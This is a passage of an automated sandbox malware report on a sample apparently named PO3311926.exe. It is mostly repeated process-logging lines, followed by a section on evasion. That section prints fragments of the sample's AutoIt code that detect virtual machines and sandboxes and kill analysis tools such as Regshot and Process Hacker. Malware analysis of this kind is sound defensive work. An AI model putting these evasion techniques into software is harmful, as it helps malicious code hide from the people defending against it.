Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Yara detected AntiVM autoit script
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
Found API chain indicative of sandbox detection
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598263420.000000000175F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753079110.0000000000D78000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")P
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE1
Source: sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")Y
Source: sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEOWG
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954085985.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1955387014.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: sdadbtvsh.bin.exe, 0000001A.00000002.1956682137.0000000001578000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")5*=
Source: sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210525293.000000000175D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENKQ9UK
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES=&.
Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES,
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753460451.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
Source: sdadbtvsh.bin.exe, 00000023.00000002.2210346244.0000000001728000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")I
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
